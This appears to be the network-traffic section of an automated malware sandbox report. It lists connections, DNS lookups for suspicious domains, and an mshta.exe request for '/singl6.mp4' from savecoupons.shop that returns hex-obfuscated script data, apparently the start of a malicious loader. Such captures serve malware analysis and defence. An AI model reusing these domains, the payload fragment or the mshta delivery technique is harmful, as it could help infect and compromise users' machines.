Dec 21, 2024 21:06:33.658029079 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.658430099 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.660029888 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.660043955 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.660336018 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.661340952 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.661427021 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.661447048 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.661449909 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.661461115 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.661530972 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.661587000 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.661714077 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.661778927 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:33.661884069 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:33.702207088 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.300405979 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.300502062 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.300899029 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.301002979 CET	49771	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.301022053 CET	443	49771	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.321688890 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.321717978 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.321921110 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.322118044 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.322134018 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.587575912 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.588052988 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.588921070 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.588936090 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.589224100 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.590280056 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.590352058 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.590363026 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.590401888 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.590426922 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:34.590451956 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:34.590456963 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.562083006 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.562216043 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.562357903 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.562515020 CET	49772	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.562549114 CET	443	49772	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.610349894 CET	49767	443	192.168.11.20	172.217.15.196
Dec 21, 2024 21:06:35.633929014 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.633969069 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.634635925 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.634635925 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.634679079 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.901783943 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.902004957 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.903780937 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.903794050 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.904182911 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.905219078 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.905348063 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.905365944 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.905395985 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.905422926 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.905451059 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.905522108 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:35.905833960 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:35.905896902 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:36.900232077 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:36.900329113 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:36.900547028 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:36.900547028 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:36.957770109 CET	49774	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:36.957802057 CET	443	49774	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:36.957969904 CET	49774	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:36.958165884 CET	49774	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:36.958178997 CET	443	49774	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:37.203814983 CET	49773	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:37.203840971 CET	443	49773	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:37.227320910 CET	443	49774	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:37.227791071 CET	49774	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:37.228387117 CET	49774	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:37.228399992 CET	443	49774	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:37.228744984 CET	443	49774	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:37.229793072 CET	49774	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:37.229840040 CET	49774	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:37.229860067 CET	443	49774	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:37.733501911 CET	443	49774	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:37.733711004 CET	443	49774	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:37.733872890 CET	49774	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:37.733917952 CET	49774	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:37.733926058 CET	443	49774	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.086240053 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.086261988 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.086421013 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.086596966 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.086606026 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.353420019 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.353631973 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.354512930 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.354537964 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.355031967 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.356903076 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.358017921 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.358047962 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.358067036 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.358114958 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.358129025 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.358160019 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.358335018 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.358419895 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.358524084 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.358620882 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.358685970 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.358706951 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.358911991 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.359004974 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.359294891 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.359343052 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.359484911 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.359503984 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.359656096 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.359668970 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.359874964 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.359894037 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.360061884 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.360076904 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.360260963 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.360290051 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.360443115 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.360461950 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.360615969 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.360627890 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.360805988 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.360816956 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.361025095 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.361049891 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.361188889 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.361201048 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.361409903 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.361429930 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.361593962 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.361608982 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.361767054 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.361778021 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.361963987 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.361983061 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.362193108 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.362234116 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.362349987 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.362370968 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.362600088 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.362633944 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.362770081 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.362785101 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.362915993 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.362926960 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.363152981 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.363341093 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.363511086 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.363717079 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.363886118 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.364078045 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.364319086 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.364464045 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.364679098 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.364867926 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.365046024 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.365263939 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.365444899 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.406270981 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.406517029 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.406543970 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.406728983 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.406759977 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.406774998 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.406784058 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.407026052 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.407058954 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.407190084 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.407206059 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:38.407363892 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.407593012 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.407772064 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.407927036 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.408165932 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.408345938 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.408508062 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.408732891 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.408906937 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:38.450222015 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:42.294775963 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:42.294960976 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:42.295348883 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.295348883 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.297076941 CET	49776	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.297127962 CET	443	49776	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:42.297422886 CET	49776	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.297527075 CET	49776	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.297558069 CET	443	49776	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:42.569226027 CET	443	49776	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:42.569447041 CET	49776	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.570245028 CET	49776	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.570275068 CET	443	49776	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:42.570849895 CET	443	49776	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:42.571914911 CET	49776	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.571914911 CET	49776	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.572086096 CET	443	49776	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:42.593247890 CET	49775	443	192.168.11.20	104.21.96.1
Dec 21, 2024 21:06:42.593285084 CET	443	49775	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:50.415823936 CET	443	49776	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:50.415939093 CET	443	49776	104.21.96.1	192.168.11.20
Dec 21, 2024 21:06:50.416755915 CET	49776	443	192.168.11.20	104.21.96.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 21:04:32.817714930 CET	137	137	192.168.11.20	192.168.11.255
Dec 21, 2024 21:04:33.571974039 CET	137	137	192.168.11.20	192.168.11.255
Dec 21, 2024 21:04:34.337466002 CET	137	137	192.168.11.20	192.168.11.255
Dec 21, 2024 21:04:39.579760075 CET	49161	53	192.168.11.20	1.1.1.1
Dec 21, 2024 21:04:39.712223053 CET	53	49161	1.1.1.1	192.168.11.20
Dec 21, 2024 21:04:44.246079922 CET	137	137	192.168.11.20	192.168.11.255
Dec 21, 2024 21:04:45.004961014 CET	137	137	192.168.11.20	192.168.11.255
Dec 21, 2024 21:04:45.770448923 CET	137	137	192.168.11.20	192.168.11.255
Dec 21, 2024 21:04:46.909203053 CET	58335	53	192.168.11.20	1.1.1.1
Dec 21, 2024 21:04:47.042167902 CET	53	58335	1.1.1.1	192.168.11.20
Dec 21, 2024 21:06:20.848186016 CET	64491	53	192.168.11.20	1.1.1.1
Dec 21, 2024 21:06:20.984019995 CET	53	64491	1.1.1.1	192.168.11.20
Dec 21, 2024 21:06:27.081325054 CET	53	53077	1.1.1.1	192.168.11.20
Dec 21, 2024 21:06:27.313136101 CET	61507	1900	192.168.11.20	239.255.255.250
Dec 21, 2024 21:06:27.368727922 CET	58280	53	192.168.11.20	1.1.1.1
Dec 21, 2024 21:06:27.368874073 CET	55634	53	192.168.11.20	1.1.1.1
Dec 21, 2024 21:06:27.429388046 CET	53	61506	1.1.1.1	192.168.11.20
Dec 21, 2024 21:06:27.498414993 CET	53	58280	1.1.1.1	192.168.11.20
Dec 21, 2024 21:06:27.498426914 CET	53	55634	1.1.1.1	192.168.11.20
Dec 21, 2024 21:06:28.301515102 CET	53	54485	1.1.1.1	192.168.11.20
Dec 21, 2024 21:06:28.325139999 CET	61507	1900	192.168.11.20	239.255.255.250
Dec 21, 2024 21:06:29.326098919 CET	61507	1900	192.168.11.20	239.255.255.250
Dec 21, 2024 21:06:30.334889889 CET	61507	1900	192.168.11.20	239.255.255.250
Dec 21, 2024 21:06:31.031068087 CET	53	50250	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 21, 2024 21:04:39.579760075 CET	192.168.11.20	1.1.1.1	0xdd3a	Standard query (0)	savecoupons.shop	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:04:46.909203053 CET	192.168.11.20	1.1.1.1	0x2408	Standard query (0)	journal.liveview.pw	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:20.848186016 CET	192.168.11.20	1.1.1.1	0x95aa	Standard query (0)	surmisehotte.click	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:27.368727922 CET	192.168.11.20	1.1.1.1	0xf63	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:27.368874073 CET	192.168.11.20	1.1.1.1	0x1b53	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 21, 2024 21:04:39.712223053 CET	1.1.1.1	192.168.11.20	0xdd3a	No error (0)	savecoupons.shop	172.67.223.7	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:04:39.712223053 CET	1.1.1.1	192.168.11.20	0xdd3a	No error (0)	savecoupons.shop	104.21.78.148	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:04:47.042167902 CET	1.1.1.1	192.168.11.20	0x2408	No error (0)	journal.liveview.pw	104.21.37.173	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:04:47.042167902 CET	1.1.1.1	192.168.11.20	0x2408	No error (0)	journal.liveview.pw	172.67.210.199	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:20.984019995 CET	1.1.1.1	192.168.11.20	0x95aa	No error (0)	surmisehotte.click	104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:20.984019995 CET	1.1.1.1	192.168.11.20	0x95aa	No error (0)	surmisehotte.click	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:20.984019995 CET	1.1.1.1	192.168.11.20	0x95aa	No error (0)	surmisehotte.click	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:20.984019995 CET	1.1.1.1	192.168.11.20	0x95aa	No error (0)	surmisehotte.click	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:20.984019995 CET	1.1.1.1	192.168.11.20	0x95aa	No error (0)	surmisehotte.click	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:20.984019995 CET	1.1.1.1	192.168.11.20	0x95aa	No error (0)	surmisehotte.click	104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:20.984019995 CET	1.1.1.1	192.168.11.20	0x95aa	No error (0)	surmisehotte.click	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:27.498414993 CET	1.1.1.1	192.168.11.20	0xf63	No error (0)	www.google.com	172.217.15.196	A (IP address)	IN (0x0001)	false
Dec 21, 2024 21:06:27.498426914 CET	1.1.1.1	192.168.11.20	0x1b53	No error (0)	www.google.com		65	IN (0x0001)	false

HTTP Request Dependency Graph

savecoupons.shop

journal.liveview.pw

surmisehotte.click

www.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49754	172.67.223.7	443	2044	C:\Windows\SysWOW64\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:04:40 UTC	331	OUT	GET /singl6.mp4 HTTP/1.1 Accept: / Accept-Language: en-US,en-GB;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: savecoupons.shop Connection: Keep-Alive
2024-12-21 20:04:40 UTC	946	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:04:40 GMT Content-Type: video/mp4 Content-Length: 642968 Connection: close ETag: "543530c3b4038086637accf9d95397d6" Last-Modified: Thu, 19 Dec 2024 17:35:49 GMT Vary: Accept-Encoding Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 3647 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=syYLRhMKGUmSGOJ1v8m1%2FdUpdhvp5BhMg8CKbquxcabu9PN%2BcW%2B1eNPRVPdEeUJ%2F0I%2BoqGm0vOOcO1AtEb19ab0t1QlPmqBW65Ivj7d9EAhCelZiT%2BHt9xMGEo5cmj5ahgfp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7b878ff2746a-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129611&min_rtt=129452&rtt_var=27554&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2865&recv_bytes=913&delivery_rate=29466&cwnd=243&unsent_bytes=0&cid=3ef69a0365f7a975&ts=325&x=0"
2024-12-21 20:04:40 UTC	423	IN	Data Raw: 36 36 44 37 35 56 36 65 64 36 33 53 37 34 54 36 39 42 36 66 4e 36 65 76 32 30 44 34 65 4f 35 37 6a 36 61 5a 34 65 4b 32 38 68 36 35 4c 34 66 7a 34 36 61 35 61 64 36 34 73 32 39 49 37 62 53 37 36 6e 36 31 72 37 32 6e 32 30 79 36 36 67 36 63 70 36 64 4d 34 66 70 33 64 79 32 30 74 32 37 79 32 37 41 33 62 65 36 36 66 36 66 73 37 32 42 32 30 53 32 38 53 37 36 4e 36 31 44 37 32 64 32 30 49 35 32 6c 35 39 76 34 63 6f 34 31 75 32 30 72 33 64 52 32 30 47 33 30 6f 33 62 53 35 32 6a 35 39 45 34 63 61 34 31 50 32 30 65 33 63 70 32 30 55 36 35 6d 34 66 4c 34 36 42 35 61 47 36 34 45 32 65 56 36 63 6b 36 35 5a 36 65 67 36 37 42 37 34 54 36 38 79 33 62 48 32 30 4b 35 32 65 35 39 45 34 63 70 34 31 66 32 62 46 32 62 73 32 39 4a 37 62 6c 37 36 78 36 31 75 37 32 69 32 30 4b Data Ascii: 66D75V6ed63S74T69B6fN6ev20D4eO57j6aZ4eK28h65L4fz46a5ad64s29I7bS76n61r72n20y66g6cp6dM4fp3dy20t27y27A3be66f6fs72B20S28S76N61D72d20I52l59v4co41u20r3dR20G30o3bS52j59E4ca41P20e3cp20U65m4fL46B5aG64E2eV6ck65Z6eg67B74T68y3bH20K52e59E4cp41f2bF2bs29J7bl76x61u72i20K
2024-12-21 20:04:40 UTC	1369	IN	Data Raw: 36 63 4b 36 64 77 34 66 54 32 30 66 32 62 70 32 30 4f 34 37 6d 34 66 65 37 37 6d 36 32 75 34 64 79 37 33 49 37 64 56 37 32 6f 36 35 6e 37 34 6c 37 35 44 37 32 74 36 65 57 32 30 57 36 36 64 36 63 61 36 64 77 34 66 52 37 64 48 33 62 6a 37 36 50 36 31 53 37 32 64 32 30 47 36 36 4c 36 63 79 36 64 51 34 66 62 32 30 4c 33 64 67 32 30 4a 34 65 47 35 37 50 36 61 58 34 65 58 32 38 7a 35 62 72 33 34 48 33 39 55 33 35 54 32 63 54 33 34 73 33 39 47 33 34 6d 32 63 44 33 35 42 33 30 44 33 32 48 32 63 70 33 34 6a 33 38 7a 33 34 42 32 63 59 33 34 46 33 39 79 33 37 55 32 63 42 33 34 66 33 39 6a 33 38 41 32 63 73 33 34 75 33 38 64 33 37 48 32 63 63 33 34 78 33 38 65 33 34 79 32 63 79 33 34 64 33 39 6a 33 31 70 32 63 77 33 34 6f 33 39 51 33 31 58 32 63 4c 33 34 72 33 32 44 Data Ascii: 6cK6dw4fT20f2bp20O47m4fe77m62u4dy73I7dV72o65n74l75D72t6eW20W66d6ca6dw4fR7dH3bj76P61S72d20G66L6cy6dQ4fb20L3dg20J4eG57P6aX4eX28z5br34H39U35T2cT34s39G34m2cD35B30D32H2cp34j38z34B2cY34F39y37U2cB34f39j38A2cs34u38d37H2cc34x38e34y2cy34d39j31p2cw34o39Q31X2cL34r32D
2024-12-21 20:04:40 UTC	1369	IN	Data Raw: 31 45 33 39 6e 32 63 78 33 34 41 33 32 74 33 31 45 32 63 55 33 34 6c 33 31 68 33 35 50 32 63 65 33 34 72 33 32 6c 33 32 77 32 63 44 33 34 6d 33 32 77 33 34 75 32 63 48 33 35 79 33 30 55 33 38 44 32 63 61 33 34 6d 33 34 6b 33 32 71 32 63 5a 33 34 49 33 31 5a 33 39 4c 32 63 6c 33 34 65 33 35 73 33 39 4f 32 63 41 33 34 78 33 38 73 33 37 66 32 63 42 33 34 41 33 39 77 33 32 41 32 63 65 33 34 6f 33 39 6a 33 30 69 32 63 70 33 34 64 33 31 77 33 35 72 32 63 48 33 34 48 33 34 4f 33 34 63 32 63 61 33 34 42 33 31 4e 33 35 4c 32 63 51 33 34 43 33 38 65 33 32 4d 32 63 4d 33 34 56 33 35 65 33 31 7a 32 63 79 33 34 57 33 39 76 33 33 47 32 63 75 33 34 52 33 35 73 33 30 48 32 63 42 33 34 54 33 39 59 33 33 6c 32 63 44 33 34 42 33 32 41 33 33 77 32 63 4d 33 34 69 33 32 44 33 Data Ascii: 